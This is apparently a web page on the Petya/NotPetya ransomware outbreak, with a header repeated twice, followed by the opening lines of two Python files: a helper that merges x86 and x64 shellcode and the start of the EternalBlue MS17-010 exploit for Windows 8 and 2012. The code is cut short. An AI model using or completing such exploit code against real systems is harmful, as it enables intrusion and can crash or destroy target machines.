#petya #petrWrap #notPetya
Win32/Diskcoder.Petya.C Ransomware attack.
Got new info? Email at isox@vulners.com or @isox_xx Some wrong info? Leave the comment, we will fix it!
#petya #petrWrap #notPetya
Win32/Diskcoder.Petya.C Ransomware attack.
Got new info? Email at isox@vulners.com or @isox_xx Some wrong info? Leave the comment, we will fix it!
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
import sys | |
from struct import pack | |
if len(sys.argv) < 4: | |
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0])) | |
sys.exit() | |
sc_x86 = open(sys.argv[1], 'rb').read() | |
sc_x64 = open(sys.argv[2], 'rb').read() |
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb, ntlm | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 8 and 2012 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |